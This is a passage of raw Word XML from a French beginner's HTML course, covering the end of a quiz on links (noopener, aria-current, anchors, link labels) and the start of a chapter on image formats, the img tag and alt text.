        <w:t xml:space="preserve"> sur un lien en nouvel onglet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Il empêche le référencement du lien</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 xml:space="preserve">Il empêche la nouvelle page d'accéder à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>window.opener</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Il force le téléchargement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Il ajoute une icône externe</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Quel attribut indique la page courante dans une navigation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aria-selected</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aria-current="page"</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class="active"</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selected</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 xml:space="preserve">Un lien </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>href="#section"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclenche-t-il une requête HTTP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Oui, toujours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Non, il défile dans le document courant</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Oui, si la section est sur une autre page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Seulement en HTTPS</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Pourquoi éviter le libellé « cliquez ici »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Il est trop long</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Il n'a pas de sens lorsqu'il est lu hors contexte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Il empêche l'ouverture dans un nouvel onglet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Il rend le HTML invalide</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>article.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blog/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : une seule remontée suffit pour atteindre la racine.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>noopener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> coupe la référence à la fenêtre d'origine, neutralisant les manipulations de type tabnabbing.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est l'attribut normalisé ; il porte l'état et peut être stylé sans classe supplémentaire.</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L'ancre reste locale au document : aucune requête n'est envoyée au serveur, le navigateur déplace simplement la vue.</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Les technologies d'assistance peuvent lister tous les liens : un libellé générique ne permet alors pas de savoir où mène chaque lien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>6. Images, vidéos et audio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Un média est lourd, lent et souvent invisible pour qui ne le voit pas. Le traiter correctement est un choix de qualité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 30 · Niveau : Débutant · Prérequis : chapitre 5</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Choisir un format d'image adapté à chaque usage.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Écrire un texte alternatif utile, ni absent ni décoratif.</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Servir des images adaptées à la taille et à la densité d'écran.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Intégrer vidéos et audio avec sous-titres et contrôles.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Réduire le poids sans dégrader la perception de qualité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Choisir un format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le format d'image détermine le poids, la netteté et la transparence. Un mauvais choix coûte des mégaoctets, donc des secondes, donc des visiteurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.19 — Six formats d'image et leur domaine d'élection</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126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Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="284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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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Transparence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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 recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1265"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>JPEG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2847"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Raster, avec pertes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>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3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Photos, dégradés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="126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PNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="284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Raster, sans pertes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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332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Captures, logos simples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1265"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>WebP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2847"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Raster, avec ou sans pertes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>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3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Format par défaut du Web moderne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="126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AVIF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="284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Raster, très efficace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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332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Photos, si le support est suffisant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1265"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SVG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2847"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vectoriel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>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3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Icônes, logos, schémas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="126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GIF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="284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Raster animé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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Oui (1 bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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À éviter : préférer MP4 ou WebM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La règle pratique : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>photographie → WebP ou AVIF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logo et icône → SVG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>capture d'interface → WebP ou PNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Le JPEG reste un repli universel, mais il est désormais dépassé en efficacité.</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IMAGE RASTER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Image composée d'une grille de pixels. Elle perd en netteté lorsqu'on l'agrandit.</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IMAGE VECTORIELLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Image décrite par des formes mathématiques. Elle reste nette à toute taille et pèse souvent moins de dix kilo-octets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f09.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.9 — Raster ou vectoriel ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 La balise img et son texte alternatif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est une balise orpheline : elle n'a pas de contenu, donc pas de balise fermante. Deux attributs sont indispensables : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une image correctement déclarée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&lt;img src="images/atelier.webp"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     alt="Trois personnes devant un tableau blanc couvert de schémas"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     width="1200" height="800"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     loading="lazy" decoding="async"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas une décoration : c'est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>le contenu de l'image pour qui ne la voit pas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Il remplit trois fonctions : lu par les lecteurs d'écran, affiché si l'image ne charge pas, indexé par les moteurs de recherche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.20 — Cinq situations, cinq textes alternatifs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17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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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 xml:space="preserve">Valeur de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2176"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image informative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Description factuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« Graphique : +18 % de visites en mars »</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="217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Image décorative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Chaîne vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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alt=""</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2176"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image-lien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
